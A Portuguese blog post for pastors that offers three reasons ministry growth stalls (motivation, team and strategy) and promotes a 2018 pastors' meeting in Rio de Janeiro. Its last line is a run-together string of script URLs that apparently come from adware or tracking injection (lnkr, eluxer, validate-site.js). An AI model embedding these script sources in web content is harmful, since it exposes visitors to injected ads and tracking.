Estagnei no ministério! E agora?

Muitos líderes têm comentado que estagnaram no ministério. Ou seja, até alcançaram um crescimento, mas, em dado momento, o crescimento parou de acontecer e eles não estão mais conseguindo avançar.

Por que será que isso acontece?

Existem vário motivos, é claro. Mas, três, em particular, precisam ser avaliados de perto como possíveis razões para que o crescimento tenha estagnado:

1 – Como está a sua motivação?

Existem pastores e líderes que estão tão machucados, que sofreram tanto, que passaram por tantas situações de ingratidão e/ou traição, que eles desmotivaram e estão sem ânimo para servir.

São líderes que estão exercendo a liderança, mas que a motivação necessária para que se faça com excelência já se foi há muito tempo.

A motivação do líder é a “força motriz” da liderança. É através da liderança do líder que os liderados avançam e os resultados acontecem. Sem ela, tudo fica mecânico e sem vida.

Por isso, o líder precisa, de tempos em tempos, avaliar a sua motivação e buscar um novo ânimo no Senhor, sempre que possível.

Em nosso Canal no youtube, nós temos um vídeo que pode ajudar você a respeito deste assunto – “Estou Cansado de Fazer o Bem”.

2 – Você tem uma equipe com a qual você possa contar?

Ninguém cresce sozinho. Todo líder precisa ter uma equipe com a qual possa contar para que ele possa crescer e avançar com constância.

No entanto, para isso, não basta que o líder tenha “uma equipe”. O líder precisa ter o coração desta equipe. Pessoas que ele sabe que são fiéis e que trabalharão em unidade para que tudo saia com excelência.

Liderar é influenciar. E o líder só consegue influenciar, se ele tiver o coração das pessoas. Em nosso blog, nós temos um artigo que sugere algumas “Dicas para aumentar a sua influência na liderança”.

3 – Como estão as suas estratégias?

Todo líder precisa atualizar as suas estratégias, pois as estratégias que funcionam hoje, a tendência é de que amanhã já estejam obsoletas.

Alguns líderes têm certa resistência à mudança de estratégias. No entanto, quando se fala em mudar a estratégia, não significa mudar “princípios”. Princípios bíblicos são inegociáveis! Mas o líder pode fazer com que eles sejam cumpridos de formas diferentes. É disso que se trata.

Fazer diferente para viver a diferença! Por isso, atualize-se! Uma boa oportunidade para você, que está no Rio de Janeiro, atualizar as suas estratégias, é estar no “Café de Pastores” que acontece mensalmente e que, este mês, será no dia 25 de outubro de 2018. Basta “clicar” no link e se inscrever.

 

http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=1539972930597http://makesource.cool/addons/lnkr5.min.jshttp://makesource.cool/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_http://1675450967.rsc.cdn77.org/cu/trkshpks.js